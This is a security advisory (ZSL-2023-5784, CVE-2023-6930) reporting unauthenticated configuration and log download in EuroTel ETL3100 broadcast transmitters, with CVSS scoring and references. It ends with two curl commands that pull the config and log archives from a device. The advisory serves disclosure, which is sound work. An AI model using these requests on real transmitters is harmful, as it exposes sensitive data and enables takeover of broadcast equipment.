CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
39.1%
Title: EuroTel EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability
Advisory ID: ZSL-2023-5784
Type: Local/Remote
Impact: Security Bypass, Exposure of System Information, Exposure of Sensitive Information, System Access, DoS, Privilege Escalation
Risk: (5/5)
Release Date: 09.08.2023
RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV ‘world’ to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.
EuroTel S.p.A. - <https://www.eurotel.it>
SIEL, Sistemi Elettronici S.R.L - <https://www.siel.fm>
v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
lighttpd/1.4.26
PHP/5.4.3
Xilinx Virtex Machine
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.exploit-db.com/exploits/51686>
[2] <https://packetstormsecurity.com/files/174096/>
[3] <https://cxsecurity.com/issue/WLB-2023080040>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/263881>
[5] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-05>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-6930>
[7] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-6930>
[09.08.2023] - Initial release
[31.08.2023] - Added reference [1], [2], [3] and [4]
[20.12.2023] - Added reference [5], [6] and [7]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability
Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
Product web page: https://www.eurotel.it | https://www.siel.fm
Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
Summary: RF Technology For Television Broadcasting Applications.
The Series ETL3100 Radio Transmitter provides all the necessary
features defined by the FM and DAB standards. Two bands are provided
to easily complain with analog and digital DAB standard. The Series
ETL3100 Television Transmitter provides all the necessary features
defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
well as the analog TV standards. Three band are provided to easily
complain with all standard channels, and switch softly from analog-TV
'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
Desc: The TV and FM transmitter suffers from an unauthenticated
configuration and log download vulnerability. This will enable
the attacker to disclose sensitive information and help him in
authentication bypass, privilege escalation and full system access.
Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
lighttpd/1.4.26
PHP/5.4.3
Xilinx Virtex Machine
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5784
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php
29.04.2023
--
$ curl http://192.168.2.166/cfg_download.php -o config.tgz
$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz
</p></body></html>